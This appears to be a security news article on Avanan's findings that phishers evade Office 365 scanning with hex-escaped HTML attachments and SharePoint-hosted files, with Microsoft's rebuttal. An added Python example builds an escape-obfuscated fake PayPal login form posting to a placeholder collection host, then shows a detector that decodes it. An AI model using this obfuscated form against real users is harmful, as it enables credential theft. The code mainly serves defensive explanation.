Researchers from cloud security company Avanan have reported finding two ways that phishers are evading Microsoft Office 365 security protections: one using hexadecimal escape characters to conceal code and links, and the other by abusing files hosted on SharePoint.
In one recent example, Avanan came across a phishing email, purportedly sent by PayPal, that displayed a fraudulent login page asking for account information such as name, address, phone number and password. By entering the information and clicking a submit button, the recipient unknowingly transmits it to the cybercriminals.
Avanan reports that these emails are good at evading detection because their malicious links are hidden behind the escape sequences, the fake login page is rendered locally from an HTML file rather than fetched from a remote site (so there is no suspicious URL to follow), and sandbox technologies generally don't treat an HTML file containing a submit button as suspicious.
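The obfuscation and the countermeasure described above, as an added example that is not part of the Avanan report or of the original article. The attachment content, the domain paypal-login.example and the function names are constructed for illustration. The detector decodes JavaScript `\xNN`/`\uNNNN` escapes, HTML numeric character references and URL percent-encoding, repeating until nothing changes (this goes slightly beyond the hex-escape case the article names, since the same layering trick works with the other encodings), and only then looks for URLs and a locally rendered login form:

```python
import re
from html import unescape
from urllib.parse import unquote

# --- attacker side (constructed sample, not taken from the report) ---------

def js_hex_escape(s: str) -> str:
    """Encode every character as a JavaScript \\xNN (or \\uNNNN) escape, the
    way the hidden form markup in the described attachment is encoded."""
    return "".join(
        f"\\x{ord(c):02x}" if ord(c) <= 0xFF else f"\\u{ord(c):04x}" for c in s
    )

# Constructed login form; the action domain is a placeholder, not a real one.
FORM_HTML = (
    '<form method="POST" action="https://paypal-login.example/collect.php">'
    '<input name="email"><input name="password" type="password">'
    '<input type="submit" value="Log In"></form>'
)

# The HTML attachment as a scanner would see it: the raw bytes contain no
# "<form", no "http" and no domain name, only document.write of escapes.
SAMPLE_ATTACHMENT = (
    '<html><body><script>document.write("'
    + js_hex_escape(FORM_HTML)
    + '")</script></body></html>'
)

# --- defender side --------------------------------------------------------

JS_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
FORM_ACTION_RE = re.compile(r"<form[^>]*\baction\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
SUBMIT_RE = re.compile(r"<(?:input|button)[^>]*\btype\s*=\s*[\"']?submit", re.IGNORECASE)


def decode_js_escapes(text: str) -> str:
    """Replace JavaScript \\xNN and \\uNNNN sequences with the characters they encode."""
    return JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def deobfuscate(text: str, max_rounds: int = 5) -> str:
    """Peel JS escapes, HTML numeric character references and percent-encoding
    off the text until it stops changing; attackers stack these layers."""
    for _ in range(max_rounds):
        decoded = unquote(unescape(decode_js_escapes(text)))
        if decoded == text:
            break
        text = decoded
    return text


def scan_attachment(html: str) -> dict:
    """Compare what a naive scan sees with what is visible after decoding, and
    flag the 'local form with a submit button posting off-site' pattern."""
    decoded = deobfuscate(html)
    actions = FORM_ACTION_RE.findall(decoded)
    return {
        "urls_in_raw": sorted(set(URL_RE.findall(html))),
        "urls_after_decoding": sorted(set(URL_RE.findall(decoded))),
        "form_actions": actions,
        "local_login_form": bool(actions and SUBMIT_RE.search(decoded)),
    }


if __name__ == "__main__":
    for key, value in scan_attachment(SAMPLE_ATTACHMENT).items():
        print(f"{key}: {value}")
```

In the sample the raw bytes contain no URL at all, which is exactly why a scanner that pattern-matches the attachment as delivered finds nothing; the decoding pass has to run before any URL reputation lookup. The combination that the sandbox heuristic mentioned above ignores, a form with a submit button whose action points to an external host, is what `local_login_form` reports.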
Avanan claims that the phishing emails elude detection because Microsoft treats files on SharePoint as safe, SharePoint being Microsoft's own application. "Most people would assume that files on SharePoint and OneDrive would be scanned for malware, but the fact is that the scanning tools Microsoft uses for Office 365 are not used for files within SharePoint and OneDrive. Even if the malware is identified once, the same file in a different location in SharePoint will not be blocked," Avanan has reported.
"We disagree with Avanan's claims," said a Microsoft spokesperson in a statement emailed to SC Media. "Microsoft's filters do not rely on the specific techniques described in the vendor post, and our solutions regularly detect and flag these kinds of attacks. In addition, we always encourage customers to use caution when clicking on links and opening emails from unknown senders."
Avanan suspects that Chinese cybercriminals may be behind the SharePoint operation, based on the use of a malicious domain that was registered this week from China.